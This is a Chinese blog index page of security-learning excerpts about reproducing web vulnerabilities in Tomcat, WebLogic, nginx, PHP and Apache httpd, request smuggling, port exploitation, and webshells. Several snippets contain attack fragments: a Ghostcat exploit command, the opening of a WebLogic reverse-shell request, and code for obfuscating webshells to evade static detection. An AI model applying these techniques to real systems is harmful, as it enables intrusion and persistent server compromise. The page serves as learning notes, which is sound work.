![](https://img-blog.csdnimg.cn/20201014180756923.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
web学习
文章平均质量分 65
web学习
I·CE
学的杂,,,
展开
-
httpproxy+shiro
CVE-2016-5385漏洞产生的原理:有了以上的铺垫,可以大概猜想,如果cgi处理解析后的环境变量时,没有进行安全检查,可能会被黑阔恶意利用。而httpoxy,恰是本次漏洞的切入点。在CGI(RFC 3875)的模式的时候, 会把http头部, 加上HTTP_ 前缀, 注册为环境变量。 如果在Header中发送一个Proxy:xxxxxx, 那么PHP就会把他注册为HTTP_PROXY环境变量,篡改着就可以在该代理服务器上监听这些请求。影响版本:PHP5.6.24版本修复了该漏洞,不会原创 2022-05-28 17:29:16 · 290 阅读 · 0 评论 -
tomcat
cve-2020-1938Apache Tomcat 6Tomcat 7系列 <7.0.100Tomcat 8系列 < 8.5.51Tomcat 9 系列 <9.0.31读取配置文件python3 /root/桌面/cve-2020-1983/tomcat.py read_file --webapp=manager /WEB-INF/web.xml 192.168.64.142https://github.com/YDHCUI/CNVD-2020-10487-Tomcat原创 2022-05-28 17:27:52 · 190 阅读 · 0 评论 -
weblogic已复现漏洞
CVE-2017-10271远程代码执行漏洞**漏洞本质:**主要是由于wls组件使用了webservice来请求soap请求,所以通过构造SOAP(XML)格式的请求,在解析的过程中导致XMLDecoder反序列化漏洞,可导致执行任意命令影响版本10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 , 12.2.1.2反弹shellPOST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 192.168.64.142:7001U原创 2022-05-28 17:19:59 · 405 阅读 · 0 评论 -
nginx已复现漏洞
cve-2017-7529原理:nginx在反向代理站点时,通常会将一些文件进行缓存,特别是静态文件,缓存部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”,如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户在请求中包含range头,nginx将会根据指定的start和ed位置返回指定长度内容如果构造两个负位置,如(-600, -9223372036854774591),将会读取到负位置的数据,如果这次请求又命中了缓存文件,原创 2022-05-28 17:18:31 · 1476 阅读 · 0 评论 -
php已复现漏洞
CVE-2019-11043特定配置的nginx+php-fpm的服务器会存在漏洞如下配置:location ~ [^/]\.php(/|$) { ... fastcgi_split_path_info ^(.+?\.php)(/.*)$; fastcgi_param PATH_INFO $fastcgi_path_info; fastcgi_pass php:9000; ... }可以使用换行符(%0a)来破坏fastcgi_split_path_info指令中的R原创 2022-05-28 17:15:45 · 100 阅读 · 0 评论 -
httpd已复现漏洞
CVE-2017-15715:2.4.0~2.4.2900截断,后缀名后面加0A,1.php后面加上一个空格,然后双击空格,右边出现hex进制,然后改成0ACVE-2021-41773:目录穿越,Apache httpd Server 2.4.49 版本引入了一个具有路径穿越漏洞的新函数,但需要配合穿越的目录,配置 Require all granted,攻击者可利用该漏洞实现路径穿越从而读取任意文件,或者在配置了cgi的httpd程序中执行bash指令,从而有机会控制服务器。文件读取 payl原创 2022-05-28 17:14:37 · 726 阅读 · 0 评论 -
HTTP请求走私及其一系列
参考文章:https://www.anquanke.com/post/id/249446https://www.anquanke.com/post/id/220996https://www.anquanke.com/post/id/246516https://paper.seebug.org/1048/HTTP请求走私产生原因在http 1.1中加了keep-Alive和Pipeline知识点1.Content-Length <length>消息的长度,用十进制数字表示原创 2022-05-28 17:06:36 · 915 阅读 · 0 评论 -
常见端口及利用
若有错误请指正文件共享服务端口:端口号端口说明使用说明21,22,69FTP/TFTP文件传输协议允许匿名的上传和下载,爆破和嗅探操作2049NFS服务配置不当139SAMBA服务单爆破,未授权访问,远程代码执行389LDAP目录访问协议注入,允许匿名访问,弱口令远程连接服务端口:22SSH远程连接爆破,SSH隧道及内网代理转发,文件传输23Telnet远程连接爆破,嗅探,弱口令3389RDP远程桌面连接原创 2022-02-27 17:31:49 · 497 阅读 · 0 评论 -
webshell静态检测的绕过
一句话木马原理:基于_POST,[]等的检测base64编码:$b = base64_encode(‘_POST’);echo $b;echo ‘<br/>’;echo base64_decode($b);gzcompress压缩:$c = gzcompress('_POST');echo $c;echo '<br/>';echo gzuncompress($c);注释:@${$__}[!$_](${$__}[$_]);@$_="s"."s"./*-/*原创 2022-03-23 19:35:23 · 3451 阅读 · 0 评论 -
php弱类型的研究
对php弱类型的学习原创 2022-02-20 16:10:41 · 240 阅读 · 1 评论 -
无数字字母webshell之自增
无数字字母webshell之自增原创 2022-04-03 13:23:17 · 252 阅读 · 0 评论 -
HTTP请求走私前章---关于http协议的简单学习
若有什么建议和错误还请指出HTTP协议:HTTP是超文本传输协议,是一个基于请求与响应模式的,无状态的,应用层的协议,常基于TCP的连接方式(新手可以理解为传输网页的协议吧233)**无状态:**对于事务处理没有记忆能力,每次的请求都是独立的,它的执行情况和结果与前面的请求和之后的请求是无直接关系的,它不会受前面的请求应答情况直接影响,也不会直接影响后面的请求应答情况HTTP报文:图片来源于https://www.cnblogs.com/klguang/p/4618526.html报文可以b原创 2022-02-18 13:29:04 · 257 阅读 · 0 评论